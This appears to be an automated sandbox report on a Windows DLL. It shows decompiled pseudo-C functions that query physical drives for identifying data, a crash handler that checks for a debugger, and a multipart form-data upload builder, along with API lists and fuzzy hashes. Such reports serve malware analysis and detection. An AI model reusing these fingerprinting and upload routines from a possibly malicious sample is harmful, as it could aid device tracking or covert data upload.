                                                                                                                                                      • Opcode ID: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                      • Instruction ID: e843174948dd7abc5fb59b2edd762e96836351ae516af004f3d86572885adcf9
                                                                                                                                                      • Opcode Fuzzy Hash: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                      • Instruction Fuzzy Hash: 21613DB1D04218ABEB20DF54CC95BDDB7B6EF84304F148199E509BB280D776AA94CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001DA70, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                      			E1001DA70(void* __edi, intOrPtr _a4) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				void* _v16;
				short _v532;
				struct _OVERLAPPED* _v536;
				struct _OVERLAPPED* _v540;
				void _v544;
				long _v548;
				struct _OVERLAPPED* _v552;
				intOrPtr _v10532;
				void _v10556;
				char _v11556;
				void* _t56;
				void* _t70;
				void* _t71;

				_t70 = __edi;
				E10018AA0(0x2d20);
				if(_a4 == 0) {
					L13:
					return 0;
				}
				_v8 = 0;
				_v12 = 0;
				_v552 = 0;
				while(1 != 0) {
					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
					_t71 = _t71 + 0xc;
					_v16 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0);
					if(_v16 == 0xffffffff) {
						L10:
						_v8 =  &(_v8->Internal);
						_v552 = _v8;
						if(_v8 < 4) {
							continue;
						}
						return _v12;
					}
					_v548 = 0;
					_v536 = 0;
					_v544 = 0;
					_v540 = 0;
					E1000CF20(_t70,  &_v10556, 0, 0x2710);
					_t71 = _t71 + 0xc;
					if(DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0) != 0) {
						E1000CF20(_t70,  &_v11556, 0, 0x3e8);
						E1001D040(_v10532,  &_v10556,  &_v11556);
						_t56 = E1001CFA0( &_v11556, 0x104, _a4);
						_t71 = _t71 + 0x24;
						if(_t56 == 0) {
							_v12 = 1;
						}
					}
					CloseHandle(_v16);
					if(_v12 == 0) {
						_v8 = _v552;
						goto L10;
					} else {
						return _v12;
					}
				}
				goto L13;
			}


















                                                                                                                                                      0x1001da70
                                                                                                                                                      0x1001da78
                                                                                                                                                      0x1001da81
                                                                                                                                                      0x1001dbf0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dbf0
                                                                                                                                                      0x1001da87
                                                                                                                                                      0x1001da8e
                                                                                                                                                      0x1001da95
                                                                                                                                                      0x1001da9f
                                                                                                                                                      0x1001dabc
                                                                                                                                                      0x1001dac2
                                                                                                                                                      0x1001dade
                                                                                                                                                      0x1001dae5
                                                                                                                                                      0x1001dbce
                                                                                                                                                      0x1001dbd4
                                                                                                                                                      0x1001dbda
                                                                                                                                                      0x1001dbe4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dbeb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dbe6
                                                                                                                                                      0x1001daeb
                                                                                                                                                      0x1001daf5
                                                                                                                                                      0x1001daff
                                                                                                                                                      0x1001db09
                                                                                                                                                      0x1001db21
                                                                                                                                                      0x1001db26
                                                                                                                                                      0x1001db58
                                                                                                                                                      0x1001db68
                                                                                                                                                      0x1001db85
                                                                                                                                                      0x1001db9d
                                                                                                                                                      0x1001dba2
                                                                                                                                                      0x1001dba7
                                                                                                                                                      0x1001dba9
                                                                                                                                                      0x1001dba9
                                                                                                                                                      0x1001dba7
                                                                                                                                                      0x1001dbb4
                                                                                                                                                      0x1001dbbe
                                                                                                                                                      0x1001dbcb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dbc0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dbc0
                                                                                                                                                      0x1001dbbe
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                      • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                      • _memset.LIBCMT ref: 1001DB21
                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 1001DB50
                                                                                                                                                      • _memset.LIBCMT ref: 1001DB68
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1001DBB4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandlewsprintf
                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                      • API String ID: 1858725146-2935326385
                                                                                                                                                      • Opcode ID: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                      • Instruction ID: bc891f1c4ccce3a70caf683a604835e8428f56d0e5539b736f6604e1ef8a2667
                                                                                                                                                      • Opcode Fuzzy Hash: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                      • Instruction Fuzzy Hash: A6412B75D40218EBEB10EB90DC99FDDB7B8EB14704F108599E509AA281D7B4AB88CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001D370, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E1001D370(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _v24;
				short _v540;
				char _v1564;
				long _v1568;
				long _v1572;
				intOrPtr _v1576;
				struct _OVERLAPPED* _v1580;
				struct _OVERLAPPED* _v1584;
				struct _OVERLAPPED* _v1588;
				struct _OVERLAPPED* _v1592;
				struct _OVERLAPPED* _v1596;
				struct _OVERLAPPED* _v1600;
				struct _OVERLAPPED* _v1604;
				void _v1608;
				void* __ebp;
				int _t63;
				void* _t64;
				int _t76;
				void* _t77;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t97 = __esi;
				_t96 = __edi;
				_t77 = __ebx;
				_v12 = 0;
				_v16 = _a4;
				_v1584 = 0;
				_v1580 = 0;
				do {
					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
					_t99 = _t99 + 0xc;
					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
					if(_v24 != 0xffffffff) {
						_v1572 = 0;
						_v1608 = 0;
						_v1604 = 0;
						_v1600 = 0;
						_v1596 = 0;
						_v1592 = 0;
						_v1588 = 0;
						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
						__eflags = _t63;
						if(_t63 != 0) {
							_t64 = L1000CE56(_t77,  &_v1608, _t96, _t97, 0x221);
							_t100 = _t99 + 4;
							_v8 = _t64;
							 *((char*)(_v8 + 0xa)) = 0xec;
							_v1568 = 0;
							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
							if(__eflags == 0) {
								L10:
								CloseHandle(_v24);
								_push(_v8);
								E1000CA30(_t77, _t96, _t97, __eflags);
								_t99 = _t100 + 4;
								__eflags = _v1584;
								if(_v1584 == 0) {
									_v12 = _v1580;
									goto L13;
								}
								break;
							}
							_v20 = 0;
							do {
								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
								_v20 = _v20 + 1;
								__eflags = _v20 - 0x100;
							} while (_v20 < 0x100);
							_v1576 = E1001CD70( &_v1564);
							_t76 = E1001CFA0(_v1576, 0x104, _v16);
							_t100 = _t100 + 0x10;
							__eflags = _t76;
							if(__eflags == 0) {
								_v1584 = 1;
							}
							goto L10;
						}
						goto L13;
					}
					L13:
					_v12 =  &(_v12->Internal);
					_v1580 = _v12;
				} while (_v12 < 4);
				return _v1584;
			}































                                                                                                                                                      0x1001d370
                                                                                                                                                      0x1001d370
                                                                                                                                                      0x1001d370
                                                                                                                                                      0x1001d379
                                                                                                                                                      0x1001d383
                                                                                                                                                      0x1001d386
                                                                                                                                                      0x1001d390
                                                                                                                                                      0x1001d39a
                                                                                                                                                      0x1001d3aa
                                                                                                                                                      0x1001d3b0
                                                                                                                                                      0x1001d3cf
                                                                                                                                                      0x1001d3d6
                                                                                                                                                      0x1001d3dd
                                                                                                                                                      0x1001d3e7
                                                                                                                                                      0x1001d3f1
                                                                                                                                                      0x1001d3fb
                                                                                                                                                      0x1001d405
                                                                                                                                                      0x1001d40f
                                                                                                                                                      0x1001d419
                                                                                                                                                      0x1001d442
                                                                                                                                                      0x1001d448
                                                                                                                                                      0x1001d44a
                                                                                                                                                      0x1001d456
                                                                                                                                                      0x1001d45b
                                                                                                                                                      0x1001d45e
                                                                                                                                                      0x1001d464
                                                                                                                                                      0x1001d468
                                                                                                                                                      0x1001d499
                                                                                                                                                      0x1001d49b
                                                                                                                                                      0x1001d506
                                                                                                                                                      0x1001d50a
                                                                                                                                                      0x1001d513
                                                                                                                                                      0x1001d514
                                                                                                                                                      0x1001d519
                                                                                                                                                      0x1001d51c
                                                                                                                                                      0x1001d523
                                                                                                                                                      0x1001d52d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d52d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d525
                                                                                                                                                      0x1001d49d
                                                                                                                                                      0x1001d4a4
                                                                                                                                                      0x1001d4b2
                                                                                                                                                      0x1001d4bf
                                                                                                                                                      0x1001d4c2
                                                                                                                                                      0x1001d4c2
                                                                                                                                                      0x1001d4da
                                                                                                                                                      0x1001d4f0
                                                                                                                                                      0x1001d4f5
                                                                                                                                                      0x1001d4f8
                                                                                                                                                      0x1001d4fa
                                                                                                                                                      0x1001d4fc
                                                                                                                                                      0x1001d4fc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d4fa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d44c
                                                                                                                                                      0x1001d530
                                                                                                                                                      0x1001d536
                                                                                                                                                      0x1001d53c
                                                                                                                                                      0x1001d542
                                                                                                                                                      0x1001d555

                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfW.USER32 ref: 1001D3AA
                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D3C9
                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 1001D442
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ControlCreateDeviceFilewsprintf
                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                      • API String ID: 3081802084-2935326385
                                                                                                                                                      • Opcode ID: 2fadef59205d778281ae9fe9edf870ac3f4638ab99f78137041e2ce31b984e5b
                                                                                                                                                      • Instruction ID: c19dd4f4148ea860b5569224362e113c716c363f4a93641ea984967bd2cc70da
                                                                                                                                                      • Opcode Fuzzy Hash: 2fadef59205d778281ae9fe9edf870ac3f4638ab99f78137041e2ce31b984e5b
                                                                                                                                                      • Instruction Fuzzy Hash: E9513EB4D00318ABEB10DF94DC95BDEB7B5EB84304F108198E509AB280D7B6AA94CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000EFFC, Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E1000EFFC(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x103322d8; // 0x493ea81e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10333a58 = _t6;
				 *0x10333a54 = _t22;
				 *0x10333a50 = _t25;
				 *0x10333a4c = _t21;
				 *0x10333a48 = _t27;
				 *0x10333a44 = _t26;
				 *0x10333a70 = ss;
				 *0x10333a64 = cs;
				 *0x10333a40 = ds;
				 *0x10333a3c = es;
				 *0x10333a38 = fs;
				 *0x10333a34 = gs;
				asm("pushfd");
				_pop( *0x10333a68);
				 *0x10333a5c =  *_t31;
				 *0x10333a60 = _v0;
				 *0x10333a6c =  &_a4;
				 *0x103339a8 = 0x10001;
				_t11 =  *0x10333a60; // 0x0
				 *0x1033395c = _t11;
				 *0x10333950 = 0xc0000409;
				 *0x10333954 = 1;
				_t12 =  *0x103322d8; // 0x493ea81e
				_v812 = _t12;
				_t13 =  *0x103322dc; // 0xb6c157e1
				_v808 = _t13;
				 *0x103339a0 = IsDebuggerPresent();
				_push(1);
				E10013A5E(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10023b34);
				if( *0x103339a0 == 0) {
					_push(1);
					E10013A5E(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000f002
                                                                                                                                                      0x1000f004
                                                                                                                                                      0x1000f004
                                                                                                                                                      0x10016115
                                                                                                                                                      0x1001611a
                                                                                                                                                      0x10016120
                                                                                                                                                      0x10016126
                                                                                                                                                      0x1001612c
                                                                                                                                                      0x10016132
                                                                                                                                                      0x10016138
                                                                                                                                                      0x1001613f
                                                                                                                                                      0x10016146
                                                                                                                                                      0x1001614d
                                                                                                                                                      0x10016154
                                                                                                                                                      0x1001615b
                                                                                                                                                      0x10016162
                                                                                                                                                      0x10016163
                                                                                                                                                      0x1001616c
                                                                                                                                                      0x10016174
                                                                                                                                                      0x1001617c
                                                                                                                                                      0x10016187
                                                                                                                                                      0x10016191
                                                                                                                                                      0x10016196
                                                                                                                                                      0x1001619b
                                                                                                                                                      0x100161a5
                                                                                                                                                      0x100161af
                                                                                                                                                      0x100161b4
                                                                                                                                                      0x100161ba
                                                                                                                                                      0x100161bf
                                                                                                                                                      0x100161cb
                                                                                                                                                      0x100161d0
                                                                                                                                                      0x100161d2
                                                                                                                                                      0x100161da
                                                                                                                                                      0x100161e5
                                                                                                                                                      0x100161f2
                                                                                                                                                      0x100161f4
                                                                                                                                                      0x100161f6
                                                                                                                                                      0x100161fb
                                                                                                                                                      0x1001620f

                                                                                                                                                      APIs
                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 100161C5
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100161DA
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(10023B34), ref: 100161E5
                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 10016201
                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 10016208
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                      • Opcode ID: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                      • Instruction ID: 7a4982afc0af0121ee83e1bbc930dedb521e4c826244c77e9c1cc9287b5788a2
                                                                                                                                                      • Opcode Fuzzy Hash: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                      • Instruction Fuzzy Hash: 0A21CCB4901264EFE700DF29DCC86447BA8FB88311F50D11AE98D8AB62E7B499C5CF02
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10021460, Relevance: 48.4, APIs: 32, Instructions: 449COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E10021460(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v543;
				char _v544;
				char _v807;
				char _v808;
				char* _v812;
				char _v1079;
				char _v1080;
				char* _v1084;
				char* _v1088;
				char _v1599;
				char _v1600;
				intOrPtr _v1604;
				char _v15703;
				char _v15704;
				char* _v15708;
				char _v29807;
				char _v29808;
				char* _v29812;
				char _v43911;
				char _v43912;
				char _v58007;
				char _v58008;
				char _v58024;
				char _v58052;
				char _v58080;
				char _v58084;
				void* __esi;
				void* _t172;
				intOrPtr _t179;
				void* _t186;
				void* _t195;
				void* _t216;
				void* _t218;
				void* _t237;
				void* _t254;
				intOrPtr _t297;
				intOrPtr _t357;
				void* _t359;
				void* _t366;
				void* _t376;
				void* _t385;
				void* _t392;

				_t353 = __edi;
				_t265 = __ebx;
				_push(0xffffffff);
				_push(E10022B1C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t357;
				E10018AA0(0xe2d4);
				_push(_t354);
				_v24 = 0;
				_v28 = "--";
				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
					_v1084 = "Content-Type: %s";
					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
					_v808 = 0;
					E1000CF20(__edi,  &_v807, 0, 0x103);
					_v1080 = 0;
					E1000CF20(_t353,  &_v1079, 0, 0x103);
					_v1600 = 0;
					E1000CF20(_t353,  &_v1599, 0, 0x1ff);
					_push(_a20);
					_push(_a16);
					E1000CC93(_t353,  &_v808, _v812, _a16);
					E1000CC93(_t353,  &_v1080, _v1084, _a24);
					_push( &_v1080);
					_push( &_v808);
					_push(_a4);
					E1000CC93(_t353,  &_v1600, _v1088, _v28);
					_t392 = _t357 + 0x5c;
					if( *_a36 != 0) {
						E1000D190(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAC0( &_v1600));
						_t392 = _t392 + 0x10;
					}
					_t254 = E1000CAC0( &_v1600);
					_t357 = _t392 + 4;
					_v24 = _t254 + _v24;
					if( *_a36 != 0) {
						E1000D190(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
						_t357 = _t357 + 0xc;
					}
					_v24 = _v24 + _a32;
				}
				if(_a8 != 0 && _a12 > 0) {
					_t172 = E10001A50(_a8, "=");
					_t357 = _t357 + 8;
					if(_t172 != 0) {
						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
						_v58008 = 0;
						E1000CF20(_t353,  &_v58007, 0, 0x370f);
						_v29808 = 0;
						E1000CF20(_t353,  &_v29807, 0, 0x370f);
						_v43912 = 0;
						E1000CF20(_t353,  &_v43911, 0, 0x370f);
						_v15704 = 0;
						E1000CF20(_t353,  &_v15703, 0, 0x370f);
						_t179 = E10001A50(_a8, "&");
						_t366 = _t357 + 0x38;
						_v1604 = _t179;
						if(_v1604 != 0) {
							E10001160( &_v58052, __eflags, _a8);
							_v8 = 0;
							E10002FE0( &_v58024, __eflags);
							_v8 = 1;
							E10001160( &_v58080, __eflags, "&");
							_v8 = 2;
							E1001A850(__eflags,  &_v58052,  &_v58024,  &_v58080);
							_t357 = _t366 + 0xc;
							_v58084 = 0;
							while(1) {
								_t186 = E100021E0( &_v58024);
								__eflags = _v58084 - _t186;
								if(_v58084 >= _t186) {
									break;
								}
								E1000CF20(_t353,  &_v43912, 0, 0x3710);
								E1000CF20(_t353,  &_v15704, 0, 0x3710);
								_t195 = E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=");
								_t354 = _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084));
								E1000D190(_t265, _t353, _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E10003030( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)));
								E1000D8A3(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=") + 1);
								E1000CF20(_t353,  &_v58008, 0, 0x3710);
								E1000CF20(_t353,  &_v29808, 0, 0x3710);
								E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
								_push( &_v15704);
								_push( &_v58008);
								_push(_a4);
								E1000CC93(_t353,  &_v29808, _v29812, _v28);
								_t376 = _t357 + 0x7c;
								__eflags =  *_a36;
								if( *_a36 != 0) {
									_t218 = E1000CAC0( &_v29808);
									__eflags =  *_a36 + _v24;
									E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
									_t376 = _t376 + 0x10;
								}
								_t216 = E1000CAC0( &_v29808);
								_t357 = _t376 + 4;
								_v24 = _t216 + _v24;
								_t297 = _v58084 + 1;
								__eflags = _t297;
								_v58084 = _t297;
							}
							_v8 = 1;
							E100011A0( &_v58080);
							_v8 = 0;
							E10003010( &_v58024);
							_v8 = 0xffffffff;
							E100011A0( &_v58052);
						} else {
							E1000D190(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
							E1000D8A3(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
							E1000CF20(_t353,  &_v58008, 0, 0x3710);
							E1000CF20(_t353,  &_v29808, 0, 0x3710);
							E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
							_push( &_v15704);
							_push( &_v58008);
							_push(_a4);
							E1000CC93(_t353,  &_v29808, _v29812, _v28);
							_t385 = _t366 + 0x64;
							if( *_a36 != 0) {
								E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAC0( &_v29808));
								_t385 = _t385 + 0x10;
							}
							_t237 = E1000CAC0( &_v29808);
							_t357 = _t385 + 4;
							_v24 = _t237 + _v24;
						}
					}
				}
				_v20 = "\r\n%s%s%s\r\n";
				_v544 = 0;
				E1000CF20(_t353,  &_v543, 0, 0x1ff);
				_push(_v28);
				_push(_a4);
				E1000CC93(_t353,  &_v544, _v20, _v28);
				_t359 = _t357 + 0x20;
				if( *_a36 != 0) {
					E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAC0( &_v544));
					_t359 = _t359 + 0x10;
				}
				_v24 = E1000CAC0( &_v544) + _v24;
				 *[fs:0x0] = _v16;
				return _v24;
			}


















































                                                                                                                                                      0x10021460
                                                                                                                                                      0x10021460
                                                                                                                                                      0x10021463
                                                                                                                                                      0x10021465
                                                                                                                                                      0x10021470
                                                                                                                                                      0x10021471
                                                                                                                                                      0x1002147d
                                                                                                                                                      0x10021482
                                                                                                                                                      0x10021483
                                                                                                                                                      0x1002148a
                                                                                                                                                      0x10021495
                                                                                                                                                      0x100214c3
                                                                                                                                                      0x100214cd
                                                                                                                                                      0x100214d7
                                                                                                                                                      0x100214e1
                                                                                                                                                      0x100214f6
                                                                                                                                                      0x100214fe
                                                                                                                                                      0x10021513
                                                                                                                                                      0x1002151b
                                                                                                                                                      0x10021530
                                                                                                                                                      0x1002153b
                                                                                                                                                      0x1002153f
                                                                                                                                                      0x10021552
                                                                                                                                                      0x1002156c
                                                                                                                                                      0x1002157a
                                                                                                                                                      0x10021581
                                                                                                                                                      0x10021585
                                                                                                                                                      0x10021598
                                                                                                                                                      0x1002159d
                                                                                                                                                      0x100215a6
                                                                                                                                                      0x100215c8
                                                                                                                                                      0x100215cd
                                                                                                                                                      0x100215cd
                                                                                                                                                      0x100215d7
                                                                                                                                                      0x100215dc
                                                                                                                                                      0x100215e2
                                                                                                                                                      0x100215eb
                                                                                                                                                      0x100215fe
                                                                                                                                                      0x10021603
                                                                                                                                                      0x10021603
                                                                                                                                                      0x1002160c
                                                                                                                                                      0x1002160c
                                                                                                                                                      0x10021613
                                                                                                                                                      0x1002162c
                                                                                                                                                      0x10021631
                                                                                                                                                      0x10021636
                                                                                                                                                      0x1002163c
                                                                                                                                                      0x10021646
                                                                                                                                                      0x10021650
                                                                                                                                                      0x10021665
                                                                                                                                                      0x1002166d
                                                                                                                                                      0x10021682
                                                                                                                                                      0x1002168a
                                                                                                                                                      0x1002169f
                                                                                                                                                      0x100216a7
                                                                                                                                                      0x100216bc
                                                                                                                                                      0x100216cd
                                                                                                                                                      0x100216d2
                                                                                                                                                      0x100216d5
                                                                                                                                                      0x100216e2
                                                                                                                                                      0x10021802
                                                                                                                                                      0x10021807
                                                                                                                                                      0x10021814
                                                                                                                                                      0x10021819
                                                                                                                                                      0x10021828
                                                                                                                                                      0x1002182d
                                                                                                                                                      0x10021846
                                                                                                                                                      0x1002184b
                                                                                                                                                      0x1002184e
                                                                                                                                                      0x10021869
                                                                                                                                                      0x1002186f
                                                                                                                                                      0x10021874
                                                                                                                                                      0x1002187a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1002188e
                                                                                                                                                      0x100218a4
                                                                                                                                                      0x100218cb
                                                                                                                                                      0x100218ee
                                                                                                                                                      0x10021912
                                                                                                                                                      0x10021951
                                                                                                                                                      0x10021967
                                                                                                                                                      0x1002197d
                                                                                                                                                      0x1002199a
                                                                                                                                                      0x100219a8
                                                                                                                                                      0x100219af
                                                                                                                                                      0x100219b3
                                                                                                                                                      0x100219c6
                                                                                                                                                      0x100219cb
                                                                                                                                                      0x100219d1
                                                                                                                                                      0x100219d4
                                                                                                                                                      0x100219dd
                                                                                                                                                      0x100219f2
                                                                                                                                                      0x100219f6
                                                                                                                                                      0x100219fb
                                                                                                                                                      0x100219fb
                                                                                                                                                      0x10021a05
                                                                                                                                                      0x10021a0a
                                                                                                                                                      0x10021a10
                                                                                                                                                      0x10021860
                                                                                                                                                      0x10021860
                                                                                                                                                      0x10021863
                                                                                                                                                      0x10021863
                                                                                                                                                      0x10021a18
                                                                                                                                                      0x10021a22
                                                                                                                                                      0x10021a27
                                                                                                                                                      0x10021a31
                                                                                                                                                      0x10021a36
                                                                                                                                                      0x10021a43
                                                                                                                                                      0x100216e8
                                                                                                                                                      0x10021708
                                                                                                                                                      0x10021731
                                                                                                                                                      0x10021747
                                                                                                                                                      0x1002175d
                                                                                                                                                      0x1002177a
                                                                                                                                                      0x10021788
                                                                                                                                                      0x1002178f
                                                                                                                                                      0x10021793
                                                                                                                                                      0x100217a6
                                                                                                                                                      0x100217ab
                                                                                                                                                      0x100217b4
                                                                                                                                                      0x100217d6
                                                                                                                                                      0x100217db
                                                                                                                                                      0x100217db
                                                                                                                                                      0x100217e5
                                                                                                                                                      0x100217ea
                                                                                                                                                      0x100217f0
                                                                                                                                                      0x100217f0
                                                                                                                                                      0x100216e2
                                                                                                                                                      0x10021636
                                                                                                                                                      0x10021a48
                                                                                                                                                      0x10021a4f
                                                                                                                                                      0x10021a64
                                                                                                                                                      0x10021a6f
                                                                                                                                                      0x10021a73
                                                                                                                                                      0x10021a83
                                                                                                                                                      0x10021a88
